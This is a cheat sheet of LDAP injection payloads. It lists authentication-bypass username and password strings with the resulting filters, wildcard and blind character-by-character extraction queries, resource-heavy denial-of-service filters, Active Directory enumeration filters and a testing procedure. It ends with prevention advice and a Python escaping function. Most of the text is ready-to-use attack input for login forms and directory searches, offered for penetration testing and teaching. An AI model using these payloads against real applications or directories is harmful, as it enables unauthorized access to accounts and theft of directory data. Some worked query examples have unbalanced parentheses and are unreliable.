LDAP Injection Payloads

LDAP Injection is an attack technique that exploits web applications that construct LDAP statements based on user input. Attackers can inject malicious LDAP queries to bypass authentication, access unauthorized data, or modify LDAP tree content.

Basic Concepts

LDAP (Lightweight Directory Access Protocol) uses a specific query syntax with filters enclosed in parentheses.

LDAP Filter Syntax

(attribute=value)
(&(condition1)(condition2))  # AND
(|(condition1)(condition2))  # OR
(!(condition))               # NOT

Important LDAP Attributes

  • cn - Common Name
  • uid - User ID
  • mail - Email address
  • sn - Surname
  • objectClass - Object type
  • userPassword - Password

Authentication Bypass

Basic Bypass Payloads

*
*)(uid=*)
*)(uid=*)(|(uid=*
*)(|(uid=*
admin)
admin)(|(password=*)
*)(uid=admin)

Login Form Bypass

Original Query:

(&(uid=user)(password=pass))

Injected Username: *)(uid=*
Injected Password: *

Resulting Query:

(&(uid=*)(uid=*)(password=*))

Bypass Examples

# Username: admin)(&)
# Password: anything
(&(uid=admin)(&)(password=anything))

# Username: *)(|(objectClass=*)
# Password: whatever
(&(uid=*)(|(objectClass=*))(password=whatever))

# Username: admin)(|(password=*))
# Password: empty
(&(uid=admin)(|(password=*)))(password=))

Information Disclosure

Username Enumeration

(uid=*)
(cn=*)
(mail=*)
(sn=*)
(|(cn=*)(uid=*))
(|(cn=*)(mail=*))

Extract All Users

(objectClass=*)
(objectClass=person)
(objectClass=inetOrgPerson)
(objectClass=user)
(objectClass=organizationalPerson)

Extract All Attributes

(cn=*)(mail=*)
(|(uid=*)(mail=*)(sn=*))

Wildcard Searches

(uid=a*)
(cn=ad*)
(mail=*@example.com)
(uid=adm?n)

Advanced Information Gathering

# Get all admin users
(|(cn=admin*)(uid=admin*))

# Get users with specific email domain
(mail=*@admin.com)

# Get all groups
(objectClass=group)

# Get all organizational units
(objectClass=organizationalUnit)

Blind LDAP Injection

Boolean-Based Blind Injection

# True condition
(uid=admin)(cn=*)

# False condition
(uid=admin)(cn=nonexistent)

Character-by-Character Extraction

(uid=admin)(cn=a*)  # Test if cn starts with 'a'
(uid=admin)(cn=ad*) # Test if cn starts with 'ad'
(uid=admin)(cn=adm*) # Continue...

Testing LDAP Attributes Existence

(uid=admin)(mail=*)
(uid=admin)(telephoneNumber=*)
(uid=admin)(description=*)

Special Characters

Characters that need to be escaped in LDAP queries:

  • * - Wildcard (matches any characters)
  • ( - Open parenthesis
  • ) - Close parenthesis
  • \ - Backslash
  • NUL - Null character

Escaped Characters

\2a - *
\28 - (
\29 - )
\5c - \
\00 - NUL

Advanced Techniques

AND/OR Logic Manipulation

# Original: (&(uid=user)(password=pass))

# Inject to always true
*)(|(objectClass=*)

# Results in: (&(uid=*)(|(objectClass=*))(password=pass))

Nested Filters

(|(&(uid=*)(objectClass=*))(password=*))

Denial of Service

# Complex queries that consume resources
(|(sn=*)(givenName=*))*
(|(cn=*)(uid=*)(mail=*)(sn=*)(givenName=*))

Platform-Specific Payloads

Active Directory

# Find all domain admins
(memberOf=CN=Domain Admins,CN=Users,DC=example,DC=com)

# Find users with adminCount=1
(adminCount=1)

# Find computer accounts
(objectClass=computer)

# Find service accounts
(servicePrincipalName=*)

OpenLDAP

# Find all posixAccount objects
(objectClass=posixAccount)

# Find by UID number
(uidNumber=1000)

# Find by GID
(gidNumber=100)

Detection and Testing

Error Messages

Common LDAP error messages that suggest user input is reaching the filter unescaped:

  • "Invalid DN syntax"
  • "Bad search filter"
  • "LDAP connection error"
  • "Unbalanced parentheses"

Testing Steps

  1. Test wildcards: Try * in username/password fields
  2. Test parentheses: Try )( to break the query
  3. Test boolean operators: Try | and &
  4. Observe responses: Different responses indicate injection
  5. Extract data: Use blind techniques if direct output is unavailable

Example Attack Scenarios

Scenario 1: Login Bypass

Application Code:

$filter = "(&(uid=$username)(password=$password))";

Attack:

  • Username: admin)(&)
  • Password: (anything)

Result: Query becomes (&(uid=admin)(&)(password=anything)) which matches admin user.

Scenario 2: Data Extraction

Attack:

  • Username: *)(uid=*))(|(uid=*
  • Password: *

Result: Returns all users in the directory.

Scenario 3: Privilege Escalation

Attack:

  • Username: *)(|(objectClass=*))
  • Password: (empty)

Result: May return privileged accounts.


Prevention Best Practices

  1. Input Validation: Validate and sanitize all user input
  2. Whitelist Allowed Characters: Only allow alphanumeric characters
  3. Escape Special Characters: Properly escape LDAP special characters
  4. Parameterized Queries: Use LDAP libraries with parameterization
  5. Principle of Least Privilege: Limit LDAP account permissions
  6. Error Handling: Don't reveal LDAP details in error messages
  7. Account Lockout: Implement account lockout mechanisms

Escaping Function Example (Python)

def escape_ldap(input_string):
    """Escape the RFC 4515 filter metacharacters so that user input is
    matched literally instead of altering the filter structure."""
    # Backslash is listed first: dicts keep insertion order (Python 3.7+),
    # so the backslashes introduced by the other replacements are not
    # escaped a second time.
    replacements = {
        '\\': '\\5c',
        '*': '\\2a',
        '(': '\\28',
        ')': '\\29',
        '\x00': '\\00'
    }
    for char, replacement in replacements.items():
        input_string = input_string.replace(char, replacement)
    return input_string

Testing Tools

  • LDAPNomNom - LDAP enumeration tool
  • ldapsearch - Command-line LDAP client
  • ldapdomaindump - Active Directory information dumper
  • Burp Suite - Web application security testing
  • OWASP ZAP - Security scanner

⚠️ Warning: These payloads are for educational and authorized security testing purposes only. Unauthorized use is illegal.